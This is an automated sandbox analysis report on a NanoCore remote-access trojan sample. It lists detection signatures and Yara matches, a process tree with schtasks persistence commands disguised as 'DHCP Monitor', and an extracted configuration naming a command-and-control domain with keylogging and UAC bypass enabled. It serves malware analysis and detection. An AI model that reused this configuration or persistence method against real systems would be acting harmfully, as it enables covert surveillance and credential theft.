Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report nanocore.exe

Overview

General Information

Sample Name:nanocore.exe
Analysis ID:384377
MD5:08803cc817d8b1046a964af11685b15c
SHA1:8d76cc9e4e21f90aaa0d2a8e9dd88ccb03349f29
SHA256:00343ef156007c41a76abebe2b0304aacc7e2b12e0d30ea476ecf8c847a54dfc
Tags:Nanocore
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • nanocore.exe (PID: 7064 cmdline: 'C:\Users\user\Desktop\nanocore.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
    • nanocore.exe (PID: 7104 cmdline: 'C:\Users\user\Desktop\nanocore.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
      • schtasks.exe (PID: 5800 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5108 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • nanocore.exe (PID: 4108 cmdline: C:\Users\user\Desktop\nanocore.exe 0 MD5: 08803CC817D8B1046A964AF11685B15C)
    • nanocore.exe (PID: 5904 cmdline: C:\Users\user\Desktop\nanocore.exe 0 MD5: 08803CC817D8B1046A964AF11685B15C)
  • dhcpmon.exe (PID: 5752 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 08803CC817D8B1046A964AF11685B15C)
    • dhcpmon.exe (PID: 6152 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 08803CC817D8B1046A964AF11685B15C)
  • dhcpmon.exe (PID: 6724 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
    • dhcpmon.exe (PID: 6704 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 08803CC817D8B1046A964AF11685B15C)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "bee718f3-e47a-44f8-955e-2fe2c6c0", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x215e5:$x1: NanoCore.ClientPluginHost
  • 0x21622:$x2: IClientNetworkHost
  • 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x2135d:$x1: NanoCore Client.exe
  • 0x215e5:$x2: NanoCore.ClientPluginHost
  • 0x22c1e:$s1: PluginCommand
  • 0x22c12:$s2: FileCommand
  • 0x23ac3:$s3: PipeExists
  • 0x2987a:$s4: PipeCreated
  • 0x2160f:$s5: IClientLoggingHost
00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x2134d:$a: NanoCore
    • 0x2135d:$a: NanoCore
    • 0x21591:$a: NanoCore
    • 0x215a5:$a: NanoCore
    • 0x215e5:$a: NanoCore
    • 0x213ac:$b: ClientPlugin
    • 0x215ae:$b: ClientPlugin
    • 0x215ee:$b: ClientPlugin
    • 0x214d3:$c: ProjectData
    • 0x21eda:$d: DESCrypto
    • 0x298a6:$e: KeepAlive
    • 0x27894:$g: LogClientMessage
    • 0x23a8f:$i: get_Connected
    • 0x22210:$j: #=q
    • 0x22240:$j: #=q
    • 0x2225c:$j: #=q
    • 0x2228c:$j: #=q
    • 0x222a8:$j: #=q
    • 0x222c4:$j: #=q
    • 0x222f4:$j: #=q
    • 0x22310:$j: #=q
    0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x2db9d:$x1: NanoCore.ClientPluginHost
    • 0x2dbda:$x2: IClientNetworkHost
    • 0x3170d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 132 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    10.1.nanocore.exe.415058.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0xe38d:$x1: NanoCore.ClientPluginHost
    • 0xe3ca:$x2: IClientNetworkHost
    • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    10.1.nanocore.exe.415058.1.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
    • 0xe105:$x1: NanoCore Client.exe
    • 0xe38d:$x2: NanoCore.ClientPluginHost
    • 0xf9c6:$s1: PluginCommand
    • 0xf9ba:$s2: FileCommand
    • 0x1086b:$s3: PipeExists
    • 0x16622:$s4: PipeCreated
    • 0xe3b7:$s5: IClientLoggingHost
    10.1.nanocore.exe.415058.1.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      10.1.nanocore.exe.415058.1.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xe0f5:$a: NanoCore
      • 0xe105:$a: NanoCore
      • 0xe339:$a: NanoCore
      • 0xe34d:$a: NanoCore
      • 0xe38d:$a: NanoCore
      • 0xe154:$b: ClientPlugin
      • 0xe356:$b: ClientPlugin
      • 0xe396:$b: ClientPlugin
      • 0xe27b:$c: ProjectData
      • 0xec82:$d: DESCrypto
      • 0x1664e:$e: KeepAlive
      • 0x1463c:$g: LogClientMessage
      • 0x10837:$i: get_Connected
      • 0xefb8:$j: #=q
      • 0xefe8:$j: #=q
      • 0xf004:$j: #=q
      • 0xf034:$j: #=q
      • 0xf050:$j: #=q
      • 0xf06c:$j: #=q
      • 0xf09c:$j: #=q
      • 0xf0b8:$j: #=q
      11.2.dhcpmon.exe.415058.1.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xe38d:$x1: NanoCore.ClientPluginHost
      • 0xe3ca:$x2: IClientNetworkHost
      • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 352 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\nanocore.exe, ProcessId: 7104, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
      Sigma detected: Scheduled temp file as task from temp locationShow sources
      Source: Process startedAuthor: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\nanocore.exe' , ParentImage: C:\Users\user\Desktop\nanocore.exe, ParentProcessId: 7104, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp', ProcessId: 5800

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "bee718f3-e47a-44f8-955e-2fe2c6c0", "Group": "Default", "Domain1": "chinomso.duckdns.org", "Domain2": "chinomso.duckdns.org", "Port": 7688, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "chinomso.duckdns.org", "BackupDNSServer": "chinomso.duckdns.orgAMC9Avo9uFWUE1JbxpU=", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Multi AV Scanner detection for domain / URLShow sources
      Source: chinomso.duckdns.orgVirustotal: Detection: 9%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 34%
      Source: C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dllReversingLabs: Detection: 24%
      Source: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dllReversingLabs: Detection: 24%
      Source: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dllReversingLabs: Detection: 24%
      Source: C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dllReversingLabs: Detection: 24%
      Multi AV Scanner detection for submitted fileShow sources
      Source: nanocore.exeVirustotal: Detection: 21%Perma Link
      Source: nanocore.exeReversingLabs: Detection: 34%
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6152, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7064, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 7104, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 4108, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: nanocore.exe PID: 5904, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6724, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6704, type: MEMORY
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.4920000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4910000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eec0000.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.33531ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.696a10.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.33f5530.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.32d5530.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.3.dhcpmon.exe.7130f0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.4940000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.4970000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.nanocore.exe.1eec0000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35b31ec.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.47f0000.8.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.dhcpmon.exe.1ed81458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.35ae3b6.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 8.2.nanocore.exe.1eed1458.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.35431ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.58b0000.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed80000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.7130f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.nanocore.exe.353e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 13.2.dhcpmon.exe.34731ec.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.334e3b6.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.dhcpmon.exe.1ed91458.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.2.dhcpmon.exe.715c48.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 11.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.nanocore.exe.5b31b8.2.raw.unpack, type: UNPACKEDPE
